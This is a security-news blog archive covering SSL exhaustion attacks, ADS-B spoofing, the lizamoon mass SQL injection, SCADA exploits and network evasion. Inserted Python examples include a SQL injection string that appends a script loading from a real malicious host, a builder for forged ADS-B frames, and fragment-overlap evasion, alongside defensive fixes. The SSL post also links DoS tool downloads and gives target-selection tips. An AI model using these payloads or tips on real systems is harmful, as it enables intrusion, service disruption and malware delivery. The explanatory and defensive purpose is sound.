Showing posts with label Exploits. Show all posts

Thursday, August 2, 2012

How to Spot a Fake LinkedIn Profile

Scams on LinkedIn exposed: how gullible job-seekers are beguiled.


LinkedIn is no stranger to fraud, having recently survived a heavily scrutinized password breach.


Unfortunately, it's largely up to you to protect yourself from falling into the snare of a scam artist posing as a legitimate professional connection. Understand that once you are linked with a fraudster there is no telling what type of scams they will try to pull on you.


They may also victimize your other connections if you allow your linked connections to see one another (you can change your settings to prevent this). Because some LinkedIn users are in the practice of accepting all invitations, it's incredibly important to look out for scammers.


John Thomas of Bloglerati has put together an excellent collection of fake profiles on his Facebook page, along with the following red flags for spotting fake LinkedIn profiles:

  • Lower case first and last name
  • Stock photo for profile picture
  • Minimal info in profile
  • Belongs to a large number of groups
  • Generic company name
  • Rhythmic names, like Sam Smith or Joe Johnson

Monday, November 14, 2011

Now you can DDOS SSL?

SSL DDOS tool released in to the wild with download

THC-SSL-DOS is a tool to verify the performance of SSL. Establishing a secure SSL connection requires about 15x more processing power on the server than on the client. THC-SSL-DOS exploits this asymmetric property by overloading the server and knocking it off the Internet. This problem affects all SSL implementations today.

The vendors have been aware of this problem since 2003 and the topic has been widely discussed. This attack further exploits the SSL secure renegotiation feature: over a single established connection the client can request handshake after handshake, so the server pays the expensive side of the handshake again and again while the client pays almost nothing.

Comparing flood DDoS vs. SSL-Exhaustion attack

A traditional flood DDoS attack cannot be mounted from a single DSL connection. This is because:
  • The bandwidth of a server is far superior to the bandwidth of a DSL connection
  • A DSL connection is not an equal opponent to challenge the bandwidth of a server

This is turned upside down for THC-SSL-DOS:
  • The processing capacity for SSL handshakes is far superior at the client side
  • A laptop on a DSL connection can challenge a server on a 30Gbit link

Traditional DDoS attacks based on flooding are sub-optimal. Servers are prepared to handle large amounts of traffic, and clients are constantly sending requests to the server even when not under attack. The SSL handshake is only done at the beginning of a secure session and only if security is required. Servers are not prepared to handle large numbers of SSL handshakes. The worst attack scenario is an SSL-Exhaustion attack mounted from thousands of clients (SSL-DDoS).

Tips & Tricks for whitehats
  1. The average server can do 300 handshakes per second. This would require 10-25% of your laptop's CPU.
  2. Use multiple hosts (SSL-DOS) if an SSL Accelerator is used.
  3. Be smart in target acquisition: the HTTPS port (443) is not always the best choice. Other SSL-enabled ports are less likely to sit behind an SSL Accelerator (POP3S, SMTPS, ... or the secure database port).

Countermeasures: no real solution exists. The following steps can mitigate (but not solve) the problem:
  1. Disable SSL renegotiation
  2. Invest in an SSL Accelerator

Either of these countermeasures can be circumvented by modifying THC-SSL-DOS. A better solution is desirable. Somebody should fix this.
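Disabling client-initiated renegotiation removes the "many handshakes per connection" multiplier, but a botnet can still open fresh connections and force a full handshake on each one. The following is an added example, not part of THC's tool or of the original post: a per-source token bucket of the kind a load balancer or reverse proxy can apply in front of the TLS terminator, charging renegotiations and full handshakes to the same budget. The source addresses, the event stream and the rate/burst numbers are constructed for illustration and are not figures from the THC page.

```python
"""Per-source limiter for TLS handshake work (full handshakes and renegotiations).

Added example, not part of THC-SSL-DOS or the original post. Models the
mitigation a front end (load balancer, reverse proxy) can apply once
client-initiated renegotiation is disabled: a token bucket per source address
that caps how many handshakes that source may consume per second. The event
stream and the rates below are constructed assumptions.
"""
from __future__ import annotations

import time
from dataclasses import dataclass


@dataclass
class _Bucket:
    tokens: float   # handshakes this source may still start
    updated: float  # timestamp of the last refill


class HandshakeLimiter:
    def __init__(self, rate_per_s: float = 5.0, burst: int = 20):
        self.rate = rate_per_s
        self.burst = burst
        self._buckets: dict = {}

    def allow(self, src: str, now: float | None = None) -> bool:
        """Return True if `src` may start another handshake at time `now`.

        Renegotiations are charged to the same bucket as full handshakes: on
        the server both cost the same private-key operation.
        """
        now = time.monotonic() if now is None else now
        b = self._buckets.get(src)
        if b is None:
            b = self._buckets[src] = _Bucket(float(self.burst), now)
        # Refill at the configured rate, never beyond the burst size.
        b.tokens = min(float(self.burst), b.tokens + (now - b.updated) * self.rate)
        b.updated = now
        if b.tokens >= 1.0:
            b.tokens -= 1.0
            return True
        return False


def run_events(limiter: HandshakeLimiter, events) -> dict:
    """Feed (timestamp, source, kind) events through the limiter.

    `kind` is "hello" (new connection) or "reneg" (renegotiation on an
    existing one); both are charged alike. Returns {source: (accepted, rejected)}.
    """
    stats: dict = {}
    for ts, src, _kind in events:
        counts = stats.setdefault(src, [0, 0])
        if limiter.allow(src, ts):
            counts[0] += 1
        else:
            counts[1] += 1
    return {src: tuple(c) for src, c in stats.items()}


# Constructed event stream: one DSL client firing 300 renegotiations within a
# second (THC's "300 handshakes per second" figure) next to a normal browser
# that opens three connections in the same window.
ATTACK = [(i / 300.0, "203.0.113.7", "reneg") for i in range(300)]
LEGIT = [(0.10, "198.51.100.2", "hello"), (0.11, "198.51.100.2", "hello"),
         (0.50, "198.51.100.2", "hello")]
SAMPLE_EVENTS = sorted(ATTACK + LEGIT)

if __name__ == "__main__":
    for src, (ok, dropped) in run_events(HandshakeLimiter(), SAMPLE_EVENTS).items():
        print(f"{src:15} accepted={ok:4} rejected={dropped:4}")
```

The limiter is a mitigation in the same sense as the two listed above: it bounds the damage one source can do, it does not change the cost asymmetry, and an attacker with enough addresses still wins. To check whether a server still accepts client-initiated renegotiation at all, connect with `openssl s_client -connect host:443` and type `R` followed by Enter; s_client announces `RENEGOTIATING` and a server that has renegotiation disabled refuses the second handshake instead of completing it.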
Download SSL DDOS Tool:

Windows binary: thc-ssl-dos-1.4-win-bin.zip

Unix Source : thc-ssl-dos-1.4.tar.gz
Source: http://www.thc.org/thc-ssl-dos/

Sunday, September 25, 2011

Air traffic system vulnerable to cyber attack

Next-generation global air traffic control system is vulnerable to malicious hacks that could cause catastrophe

An alarm blares in the cockpit mid-flight, warning the pilot of an imminent collision. The pilot checks his tracking display, sees an incoming aircraft and sends the plane into a dive. That only takes it into another crowded air lane, however, where it collides with a different plane. Investigators later discover that the pilot was running from a "ghost" - a phantom aircraft created by a hacker intent on wreaking havoc in the skies.

It's a fictional scenario, but US air force analysts warn that it could be played out if hackers exploit security holes in an increasingly common air traffic control technology.

At issue is a technology called Automatic Dependent Surveillance - Broadcast (ADS-B), which the International Civil Aviation Organisation certified for use in 2002. Gradually being deployed worldwide, ADS-B improves upon the radar-based systems that air traffic controllers and pilots rely on to find out the location and velocity of aircraft in their vicinity.

Conventional ground-based radar systems are expensive to run, become less accurate at determining position the further away a plane is, and are slow to calculate an aircraft's speed. Perhaps worst of all, their limited range means they cannot track planes over the ocean.

So instead of bouncing radar signals off aircraft, ADS-B uses GPS signals to continuously broadcast a plane's identity, ground position, altitude and velocity to networks of ground stations and other nearby aircraft. This way, everyone knows where everyone else is.

ADS-B transmits information in unencrypted 112-bit bursts - a measure intended to make the system simple and cheap to implement. It's this that researchers from the US Air Force Institute of Technology at Wright-Patterson Air Force Base in Ohio are unhappy with. Donald McCallie, Jonathan Butts and Robert Mills warn that the unencrypted, unauthenticated signals could be intercepted and spoofed by hackers, or simply jammed.

The team says the vulnerabilities it has identified "could have disastrous consequences including confusion, aircraft groundings, even plane crashes if exploited by adversaries" (International Journal of Critical Infrastructure Protection, DOI: 10.1016/j.ijcip.2011.06.001).
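What "unencrypted 112-bit bursts" means in practice is easiest to see from the frame layout. The following is an added example, not from the article or the AFIT paper: it assembles a Mode S DF17 (ADS-B) frame from its fields, computes the 24-bit CRC that is the frame's only integrity check, and shows that anyone who knows the public generator polynomial can produce a frame that a receiver accepts as well-formed. The frame format and the polynomial are the published Mode S ones; the aircraft address and message payload are constructed, and the position bits are placeholders rather than a real CPR-encoded position.

```python
"""Layout and integrity check of a 112-bit ADS-B (Mode S DF17) frame.

Added example, not from the original article. The frame format and the CRC
generator are the published Mode S specification; the frames built here are
constructed, not recordings. The point: the only integrity check is a CRC with
a public polynomial, so a receiver cannot distinguish a genuine report from a
forged "ghost" aircraft.
"""
from __future__ import annotations

GENERATOR = 0x1FFF409      # Mode S CRC-24 polynomial, 25 bits, MSB first
FRAME_BITS = 112


def mode_s_crc(frame: int, nbits: int = FRAME_BITS) -> int:
    """Polynomial remainder of `frame` (an nbits-wide integer) mod GENERATOR.

    Long division over GF(2): wherever a high bit is set, cancel it with the
    generator aligned to that bit. A correctly built DF17 frame leaves 0.
    """
    for i in range(nbits - 1, 23, -1):
        if frame >> i & 1:
            frame ^= GENERATOR << (i - 24)
    return frame & 0xFFFFFF


def build_frame(icao: int, me: int, ca: int = 5) -> str:
    """Assemble DF(5) | CA(3) | ICAO(24) | ME(56) | PI(24); return 28 hex chars.

    PI (parity/interrogator) is chosen so the whole frame divides evenly by the
    generator, which is exactly what a spoofer does too.
    """
    assert icao < 1 << 24 and me < 1 << 56 and ca < 8
    header = (17 << 3 | ca) << 24 | icao          # 32 bits: DF=17, CA, ICAO
    body = header << 56 | me                       # 88 bits, parity not yet appended
    parity = mode_s_crc(body << 24)                # remainder with a zeroed PI field
    return f"{body << 24 | parity:028X}"


def parse_frame(hexmsg: str) -> dict | None:
    """Header fields of a DF17 frame, or None if the CRC does not check out.

    DF17 only: for that format the PI field is the plain CRC, so a valid frame
    has remainder 0 over all 112 bits.
    """
    if len(hexmsg) != 28:
        return None
    frame = int(hexmsg, 16)
    if mode_s_crc(frame) != 0:
        return None                                # bit error, or tampering without fix-up
    return {
        "df": frame >> 107,                        # downlink format, 17 = ADS-B
        "ca": frame >> 104 & 0x7,                  # capability
        "icao": f"{frame >> 80 & 0xFFFFFF:06X}",   # 24-bit aircraft address
        "tc": frame >> 75 & 0x1F,                  # type code: first 5 bits of ME
    }


def flip_bit(hexmsg: str, bit: int) -> str:
    """Simulate a single-bit reception error (bit 0 is the last bit of the frame)."""
    return f"{int(hexmsg, 16) ^ (1 << bit):028X}"


# Constructed ghost aircraft: made-up ICAO address, type code 11 (airborne
# position). The remaining ME bits are placeholder data, not a real position.
GHOST_ICAO = 0xABCDEF
GHOST_ME = 11 << 51 | 0x0123456789AB
GHOST = build_frame(GHOST_ICAO, GHOST_ME)

if __name__ == "__main__":
    print("forged frame:", GHOST, "->", parse_frame(GHOST))
    print("one flipped bit:", parse_frame(flip_bit(GHOST, 40)))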

Sunday, April 3, 2011

Massive SQL injection attack

Mass Injection hits over 694,000 URLs

Hundreds of thousands of URLs have been compromised—at the time of writing, 694,000—in an enormous and indiscriminate SQL injection attack. The attack has modified text stored in databases, with the result that pages served up by the attacked systems include within each page one or more references to a particular JavaScript file.

The attack appears to be indiscriminate in its targets, with compromised machines running ASP, ASP.NET, ColdFusion, JSP, and PHP, and no doubt others. SQL injection attacks, which exploit badly-written Web applications to directly perform actions against databases, are largely independent of the technology used to develop the applications themselves: the programming errors that allow SQL injection can be made in virtually any language.

The underlying cause is a programmer trusting input that comes from a Web page—either a value from a form, or a parameter in a URL—and passing this input directly into the database. If the input is malformed in a particular way, the result is that the database will run code of the attacker's choosing. In this case, the injected SQL is simply updating text fields within the database, to make them include an extra fragment of HTML. This HTML in turn loads a JavaScript from a remote server, typically "http://lizamoon.com/ur.php" or more recently, "http://alisa-carter.com/ur.php." Both domain names resolve to the same IP address, and presently that server is not functional, leaving browsers unable to load the malicious script when they visit infected pages. Previously, it contained a simple script to redirect users to a fake anti-virus site.
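The two paragraphs above describe the programming error and the effect of the payload. The following is an added example, not the attackers' code and not the code of any affected site: a string-built UPDATE next to its parameterised replacement, run against an in-memory SQLite table, plus a catalogue-driven scan for rows that already carry the injected script reference. The schema, rows and injected string are constructed; the script URL is the one named in the article. The real campaign used stacked queries and a cursor over the database catalogue on the affected servers; this version reproduces the effect (a script reference appended to every row) inside a single UPDATE, and the scan generalises beyond one table because the campaign touched whatever text columns the catalogue listed.

```python
"""String-built UPDATE versus a parameterised one, against the mass-injection pattern.

Added example, not the attackers' code or any affected application's code.
The schema, rows and the injected string are constructed; the script URL is
the one named in the article.
"""
from __future__ import annotations

import sqlite3
from typing import List, Tuple

SCRIPT_TAG = '<script src="http://lizamoon.com/ur.php"></script>'
# Submitted as the "body" form field. The leading quote closes the string
# literal, `|| body ||` keeps the existing text, WHERE 1=1 widens the update to
# every row, and `--` comments out the application's own WHERE clause.
INJECTION = f"' || body || '{SCRIPT_TAG}' WHERE 1=1 --"


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO posts VALUES (1, 'Welcome', 'Hello'),
                                 (2, 'News',    'Second post'),
                                 (3, 'About',   'Contact us');
    """)
    return conn


def update_body_vulnerable(conn: sqlite3.Connection, post_id: int, body: str) -> None:
    """Trusts the form value and splices it into the SQL text."""
    sql = "UPDATE posts SET body = '%s' WHERE id = %d" % (body, post_id)
    conn.execute(sql)
    conn.commit()


def update_body_safe(conn: sqlite3.Connection, post_id: int, body: str) -> None:
    """Same operation with bound parameters: the value can never become SQL."""
    conn.execute("UPDATE posts SET body = ? WHERE id = ?", (body, post_id))
    conn.commit()


def bodies(conn: sqlite3.Connection) -> List[str]:
    return [row[0] for row in conn.execute("SELECT body FROM posts ORDER BY id")]


def find_injected_rows(conn: sqlite3.Connection,
                       marker: str = "ur.php") -> List[Tuple[str, str, int]]:
    """Scan every TEXT/CHAR column of every user table for the marker.

    Returns (table, column, rowid) triples so the rows can be cleaned or
    restored from backup.
    """
    hits: List[Tuple[str, str, int]] = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for _cid, col, ctype, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
            if "CHAR" not in ctype.upper() and "TEXT" not in ctype.upper():
                continue
            rows = conn.execute(
                f'SELECT rowid FROM "{table}" WHERE instr("{col}", ?) > 0', (marker,))
            hits.extend((table, col, rowid) for (rowid,) in rows)
    return hits


if __name__ == "__main__":
    db = fresh_db()
    update_body_vulnerable(db, 1, INJECTION)
    print("vulnerable:", bodies(db))
    print("hits:", find_injected_rows(db))
    db = fresh_db()
    update_body_safe(db, 1, INJECTION)
    print("parameterised:", bodies(db))
```

Note what the parameterised version does and does not do: the payload ends up stored verbatim in the one row the user was allowed to edit, and nothing else changes. That row still contains a `<script>` tag as data, so output encoding when the page is rendered remains a separate control; parameterisation only removes the path by which the value becomes SQL.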

The massive scale of these attacks (and the rapidly growing number of affected URLs) was first noticed by Websense Security Labs. On Tuesday, around 28,000 URLs were compromised; now more than 20 times more URLs are infected, and the numbers are still growing. The injected code is also found on a number of product pages on Apple's iTunes Store. Apple fetches RSS feeds from podcasters that broadcast using iTunes, and in a number of cases these broadcasters have been compromised by the SQL injection attack. As a result, the malicious code has made its way into Apple's system.

However, due to the way Apple processes the RSS feeds, there appears to be no exploitation vector; the injected HTML is safely nullified. SQL injections following this pattern appear to have been happening off and on for six or more months now. The domain name hosting the JavaScript changes each time, but the file name—ur.php—and the style of injection remain consistent. The actions of the scripts have been similar too; pop-up windows and malware downloads. Previous efforts were on a much smaller scale, however: hundreds of compromised URLs instead of hundreds of thousands.

In these earlier cases, the attacks originated from IP addresses in eastern Europe and Russia. It's been a busy week for SQL injection; at the weekend, MySQL.com, the website of Oracle-owned open source database MySQL, was hacked, again using SQL injection. A little embarrassing for a database vendor to be unable to use its own database securely.

Thursday, January 13, 2011

Windows UAC Malware Threat

The exploit allows an attacker to impersonate the system account

A new zero-day attack against Windows, capable of bypassing the User Account Control (UAC) protections introduced in Windows Vista and designed to prevent malware from gaining administrative access without user authorisation, has been discovered in the wild.

The proof-of-concept implementation of the infection technique, known as Troj/EUDPoC-A, was posted to a Chinese educational forum before being discovered by anti-virus researchers from various security firms.

Chester Wisniewski, of anti-virus vendor Sophos, warns that the technique used by the Trojan enables an attacker to impersonate the SYSTEM account, which has nearly unlimited access to all components of Windows, and does so without triggering the User Account Control protections introduced by Microsoft to prevent exactly that. The flaw currently exists in all versions of Windows.

Please ensure your system is up to date with the latest patches and your anti-virus has the latest virus definitions.

Wednesday, November 10, 2010

Pen-Testing: Learn your target, Understand your target, Develop your attack specifically around your target

Would it cripple the organization as a whole? What hurts them the most?

Since when did a penetration test become primarily automated-tool driven? Scanners are an aid but not a full substitute for us as penetration testers.

Handing a sixty page 'penetration test' report with five hundred vulnerabilities does absolutely nothing for a company aside from a check mark for whatever regulatory and compliance initiatives they have underway. It's time for a reality check:
  • Good hackers don't need to utilize expensive vulnerability scanners.

  • Good hackers don't use automated penetration testing.

  • Attackers don't have a scope or timeframes.

  • Attackers don't stop after they get root.

  • Attackers don't have portions taken out of scope.
The reality of the current situation with pentests is that the true purpose of testing is completely wasted. For one, your incident response team never gets to respond to a true, focused attack. If you are at the point where you can't detect automated scans against your network then these traditional methods are right up your alley and your security program is still immature in nature, which is fine, you'll get there. The most important element is that there is no true representation of impact or financial loss due to a breach.

In simplistic terms there's no focus on business risk; the focus is instead on the vulnerability and the exposure of the attack. We aren't hitting companies where it hurts, what makes their business run.

Penetration testing has to be something that measures the organization's business risk and impact if a breach were to occur. When attacking an organization you have to understand what is sensitive and what hurts the company the most. Intelligence gathering is one of the most important elements of a penetration test, as well as understanding and learning the network.

Learn your target, understand your target, develop your attack specifically around your target, nothing is out of scope.

Where can I have the most impact on the organization and how do I represent that? WOW I GOT DOMAIN ADMIN!!!!!! OMG I GOT ROOT! That's fantastic buddy, I'm happy for you but that doesn't mean squat to me. Present them with their intellectual property, future projections, show the ability to change their product, confidential and trade secret information or whatever you identify as what hurts them the most. Some questions to answer in Pen-testing includes but not limited to: would that impact them in a negative manner? Would it cripple the organization as a whole? What hurts them the most?

We're also significantly challenged by the basic penetration tests: how do you compete against a cheap vulnerability-scan "penetration test" with something that will cost significantly more than that and be done right? Businesses don't understand the difference, they just go with the cheapest bidder, and they don't know that what they are about to purchase sucks.

We need to hire qualified people that get it, I will pay extra for a group that knows what they are doing vs. a super cheap scan. The industry is bleeding, let's step it up and do it the right way.

Monday, November 8, 2010

SCADA security issues will be the shiny hot topic

Metasploit and SCADA Exploits: Dawn of a New Era?

On 18 October, 2010 a significant event occurred concerning threats to SCADA.

That event is the addition of a zero-day exploit for the RealFlex RealWin SCADA software product into the Metasploit repository.

Some striking facts about this event follow:

  1. This was a zero-day vulnerability that unfortunately was not reported publicly, to an organization like ICS-CERT or CERT/CC, or (afaik) to the RealFlex vendor.

  2. This exploit was not added to the public Exploit-DB site until 27 October, 2010.

  3. The existence of this exploit was not acknowledged with an ICS-CERT advisory until 1 November, 2010.

  4. This is the first SCADA exploit added to Metasploit.
Shawn Merdinger at InfoSec Island shared some interesting thoughts:

First, the SCADA community can expect to see an explosion of vulnerabilities and accompanying exploits against SCADA devices in the near future.

Second, the diverse information sources in which SCADA vulnerabilities may appear must be vigilantly monitored by numerous organizations and security researchers.

Afaik, the first widely-disseminated information on the RealFlex RealWin buffer overflow occurred on 1 November, when I sent the information to the SCADASEC mailing list.

Third, people should recognize that the recent Stuxnet threat has cast a light on SCADA security issues. Put bluntly, there is blood in the water.

Quite a few people, companies and other organizations are currently investigating SCADA product security, buying equipment and conducting security testing for a number of differing interests and objectives.

Fourth, understand that because of the current broken business model, security researchers are often frustrated by software vendors’ action, or inaction, when it comes to reporting vulnerabilities.

Often, there is no security point-of-contact at the vendor. Even worse, the technical support who are contacted by the security researcher often do not understand the technical and security implications of the issue reported.

Even in the case of specialty SCADA security shops reporting vulnerabilities to the vendor, we are seeing documented cases of "vendor spin" furthering the bad blood between vendors and ethical research.

All of these factors lead to frustrated security researchers, some of whom will simply expose the vulnerability and exploit to the world, rather than take a disclosure path through a CERT.

Fifth, folks should recognize that attack frameworks like Metasploit enable a never-before-seen level of integration of these kinds of targeted, critical-infrastructure-related exploits into a powerful tool.

Thursday, October 21, 2010

Advanced evasion techniques can bypass network security

After "APT", we now have "AET"

A new hacking technique creates a mechanism for hackers to smuggle attacks past security defences, such as firewalls and intrusion prevention systems.

So-called advanced evasion techniques (AET) are capable of bypassing network security defences, according to network security appliance vendor Stonesoft, which was the first to document the approach. Researchers at the Finnish firm came across the attack while testing its security appliance against the latest hacker exploits.

Various evasion techniques including splicing and fragmentation have existed for years. Security devices have to normalise traffic that uses these approaches, reassembling it the same way the target host will, before they can inspect payloads and block attacks; what makes AETs harder is that they combine several such evasions across protocol layers at once.
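The classic fragmentation evasion is easiest to see with overlapping fragments, where two hosts that follow different reassembly policies recover different payloads. The following is an added example, not from Stonesoft's research or the original post: a reassembler that can follow either the "first fragment wins" or the "last fragment wins" policy, a signature check under both, and the ambiguity test a normalising device applies so it can drop such datagrams instead of guessing. The fragments and the signature are constructed.

```python
"""Overlapping IP fragments: why an inspecting device must normalise first.

Added example, not from the Stonesoft research or the original post. The
fragments are constructed. Two hosts can reassemble the same overlapping
fragments differently (favour the first-arrived byte or the last), so an IDS
that guesses one policy may reconstruct a harmless request while the target
reconstructs the attack.
"""
from __future__ import annotations

from typing import Dict, List, Tuple

Fragment = Tuple[int, bytes]     # (byte offset within the datagram, payload)


def reassemble(frags: List[Fragment], policy: str) -> bytes:
    """Rebuild the datagram payload from fragments in arrival order.

    policy "first": a byte, once written, is never overwritten.
    policy "last":  later fragments overwrite earlier ones.
    """
    if policy not in ("first", "last"):
        raise ValueError(policy)
    size = max(off + len(data) for off, data in frags)
    buf = bytearray(size)
    seen = bytearray(size)            # 1 where some fragment already supplied the byte
    for off, data in frags:
        for i, byte in enumerate(data):
            pos = off + i
            if policy == "last" or not seen[pos]:
                buf[pos] = byte
            seen[pos] = 1
    return bytes(buf)


def conflicting_overlap(frags: List[Fragment]) -> bool:
    """True if two fragments cover the same byte with different values.

    This is the check a normalising device applies: such datagrams are
    ambiguous by construction and can be dropped rather than guessed at.
    """
    owner: Dict[int, int] = {}
    for off, data in frags:
        for i, byte in enumerate(data):
            pos = off + i
            if pos in owner and owner[pos] != byte:
                return True
            owner[pos] = byte
    return False


def inspect(frags: List[Fragment], signature: bytes) -> Dict[str, bool]:
    """Does the signature match under each reassembly policy?"""
    return {p: signature in reassemble(frags, p) for p in ("first", "last")}


# Constructed evasion: the decoy fragment arrives first, the real request
# overlaps it at offset 5, and the trailer completes the line.
EVASION: List[Fragment] = [
    (0, b"GET /index.html"),     # what a first-wins reassembler keeps
    (5, b"shell.html"),          # overlaps bytes 5..14 with the real target
    (15, b" HTTP/1.0\r\n"),
]
SIGNATURE = b"shell.html"

if __name__ == "__main__":
    for policy in ("first", "last"):
        print(f"{policy:5}: {reassemble(EVASION, policy)!r}")
    print("signature seen:", inspect(EVASION, SIGNATURE))
    print("ambiguous overlap:", conflicting_overlap(EVASION))
```

Under the "first" policy the signature is absent and under "last" it is present, so an inspection device has to know which policy the protected host uses, or refuse ambiguous overlaps outright; the AET research is about stacking several such ambiguities at once so that a device which handles each one in isolation still misses the combination.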

Refer here to read more details.

Monday, September 13, 2010

New security flaw exploited on Adobe Reader and Acrobat

Adobe has warned this week that a new security flaw in Reader and Acrobat is now being exploited, allowing for hackers to take over victim's systems. The company says the vulnerability can "cause a crash and potentially allow an attacker to take control of the affected system."

Affected software is Adobe Reader 9.3.4 and earlier for Windows and Mac, and Acrobat 9.3.4 and earlier for both operating systems. While Adobe would not give technical details on the flaw, security firm Secunia said it was caused by a "boundary error within the font parsing in CoolType.dll and can be exploited to cause a stack-based buffer overflow by ...tricking a user into opening a specially crafted PDF file."

Tuesday, September 7, 2010

IBM X-Force Mid-Year Trend and Risk Report

2010 Mid-year highlights

The IBM X-Force 2010 Mid-Year Trend and Risk Report reveals several key trends that demonstrate how, in the first half of 2010, attackers seeking to steal money or personal data increasingly targeted their victims via the Internet. The IBM X-Force Trend and Risk Report is produced twice per year: once at mid-year and once at year-end. This report provides statistical information about all aspects of threats that affect Internet security, including software vulnerabilities and public exploitation, malware, spam, phishing, web-based threats, and general cyber criminal activity.

Summary

Attackers are increasingly using covert techniques such as JavaScript obfuscation, which continue to frustrate IT security professionals. Obfuscation is a technique used by software developers and attackers alike to hide or mask the code used to develop their applications.

Reported vulnerabilities are at an all time high, up 36%. 2010 has seen a significant increase in volume of security vulnerability disclosures, due both to significant increases in public exploit releases and to positive efforts by several large software companies to identify and mitigate security vulnerabilities.

PDF attacks continue to increase as attackers trick users in new ways. To understand why PDFs are targeted, consider that endpoints are typically the weakest link in an enterprise organization. Attackers understand this fact well. For example, although sensitive data may not be present on a particular endpoint, that endpoint may have access to others that do. Or, that endpoint can be used as a practical bounce point to launch attacks on other computers.

The Zeus botnet toolkit continues to wreak havoc on organizations. Early 2010 saw the release of an updated version of the Zeus botnet kit, dubbed Zeus 2.0. Major new features included in this version provide updated functionality to attackers.

Vulnerabilities and exploitation highlights

=> Advanced persistent threat—What concerns X-Force most about these sophisticated attackers is their ability to successfully penetrate well defended networks in spite of significant advances in network security technology and practices. In particular, we are concerned about increasingly obfuscated exploits and covert malware command-and-control channels that fly under the radar of modern security systems.

=> Obfuscation, obfuscation, obfuscation—Attackers continue to find new ways to disguise their malicious traffic via JavaScript and PDF obfuscation. Obfuscation is a technique used by software developers and attackers alike to hide or mask the code used to develop their applications. Things would be easier if network security products could simply block any JavaScript that was obfuscated, but unfortunately obfuscation techniques are used by many legitimate websites in an attempt to prevent unsophisticated Web developers from stealing their code. These legitimate websites act as cover for the malicious ones, turning the attacks into needles in a haystack.

=> PDF attacks continue to increase as attackers trick users in new ways. To understand why PDFs are targeted, consider that endpoints are typically the weakest link in an enterprise organization. Attackers understand this fact well. For example, although sensitive data may not be present on a particular endpoint, that endpoint may have access to others that do. Or, that endpoint can be used as a practical bounce point to launch attacks on other computers.

=> Reported vulnerabilities are at an all time high—2010 has seen a significant increase in the volume of security vulnerability disclosures, due both to significant increases in public exploit releases and to positive efforts by several large software companies to identify and mitigate security vulnerabilities.

=> Web application vulnerabilities have inched up to the 55 percent mark, accounting for over half of all vulnerability disclosures in the first part of 2010.

=> Exploit Effort versus Potential Reward—What are attackers really going after? With the number of vulnerability announcements rising and vendors scrambling to provide patches and protection to problem areas, how can enterprises best prioritize the efforts of IT administrators to provide adequate coverage? The Exploit Effort versus Potential Reward Matrix provides a simple model for thinking about vulnerability triage from the perspective of attackers.

Please refer here to download or view the report.

Friday, March 26, 2010

Fully patched iPhone Hacked

Using all new ARM exploit - Entire SMS database hijacked

A pair of European researchers used the spotlight of the CanSecWest Pwn2Own hacking contest here to break into a fully patched iPhone and hijack the entire SMS database, including text messages that had already been deleted.

Using an exploit against a previously unknown vulnerability, the duo — Vincenzo Iozzo and Ralf Philipp Weinmann — lured the target iPhone to a rigged Web site and exfiltrated the SMS database in about 20 seconds. The exploit crashed the iPhone’s browser session but Weinmann said that, with some additional effort, he could have a successful attack with the browser running.

“Basically, every page that the user visits on our [rigged] site will grab the SMS database and upload it to a server we control,” Weinmann explained. Iozzo, who had flight problems, was not on hand to enjoy the glory of being the first to hijack an iPhone at the Pwn2Own challenge.

Please refer here to read more details.

Monday, September 21, 2009

Hackers exploit FTP flaw in Microsoft's IIS

Sites running the FTP service on Microsoft's Internet Information Services (IIS) Web software may be vulnerable to attacks.

Microsoft says FTP service versions 5 and 6 are affected, but claims version 7.5 is unaffected on Vista and Windows Server 2008.

Webmasters take note: if you use Microsoft's FTP service, attackers could plant code on your servers or launch a denial-of-service (DoS) attack against your site. According to Microsoft, a newly discovered set of FTP flaws allows an attacker to install unauthorized software on an Internet Information Services (IIS) server or to crash the box. The vulnerable versions of the FTP service shipped on several flavors of Windows and Windows Server over the years.

Microsoft says the latest version of the FTP service, 7.5, is safe on Vista and Windows Server 2008. The remote-execution vulnerability, which was first described on the Milw0rm security site on Aug. 31, could allow an attacker to run malicious code. Modern versions of Windows have a feature called /GS (a buffer security check) that protects them from remote-code execution, but earlier versions do not. The newly announced vulnerabilities include a buffer-overflow flaw, which could lead to a DoS attack against any of the affected versions of Windows.

Buffer-overflow attacks use an anonymous account that has both read and write permissions. The threat, however, isn't limited only to anonymous users.

Microsoft has updated security advisory 975191 to discuss all the known unpatched FTP exploits in IIS.

Wednesday, August 5, 2009

Multiple Adobe security holes closed

A regular patching cycle isn’t enough for Adobe, as multiple flaws need closing in some of its popular software products.

Adobe has released an out-of-cycle patch for its Flash Player, AIR, Reader and Acrobat software, closing more than 10 vulnerabilities that potentially left users open to attack.

It closes a recent vulnerability in Flash that was highlighted by Symantec and actively exploited in the wild. It also fixes 11 other flaws, including three that fixed problems in vulnerable Microsoft code (its Active Template Library (ATL)).

All of the fixed vulnerabilities were critical, with most having the potential to allow an attacker to take over a user’s system. Details of how to update the Adobe software can be found in its security bulletin here. Adobe is planning its next regular quarterly security update for Adobe Reader and Acrobat on 13 October.

Adobe has had a very difficult time this year, with its popular Reader and Acrobat products suffering so many problems that a Microsoft ‘Patch Tuesday’ style security update cycle has become necessary.

Cyber criminals see PDF-reading software as a good opportunity to compromise computer systems as well as to install malware.


Friday, March 6, 2009

Conficker Worm - Microsoft's fault or not?

AutoRun patch a long time coming for XP users

Nearly 18 months after it was discovered, Microsoft has finally fixed a hole in the AutoRun function of older Windows versions that allowed viruses to spread via external storage devices.


While it's good to know Microsoft is finally listening to the complaints of the Windows community, the company's delay in applying important patches put our systems at risk unnecessarily.

The more noise customers make, the more likely the problems will be rectified. Most recently, the Conficker worm has been spreading across networks, often entering systems via USB flash drives and other removable media. Shamefully, Microsoft could have — and should have — prevented this massive infection from happening in the first place.

In October 2007, Nick Brown documented in his blog how viruses and worms were entering his network via USB memory sticks. Fast-forward to one year ago. Will Dormann and US-CERT (the United States Computer Emergency Readiness Team) published information on Mar. 20, 2008, confirming that Microsoft's AutoRun advice didn't block threats.

In July 2008, Microsoft released security bulletin MS08-038. The patch in this bulletin made it possible for users to control AutoRun properly, but only on Windows Vista and Server 2008.

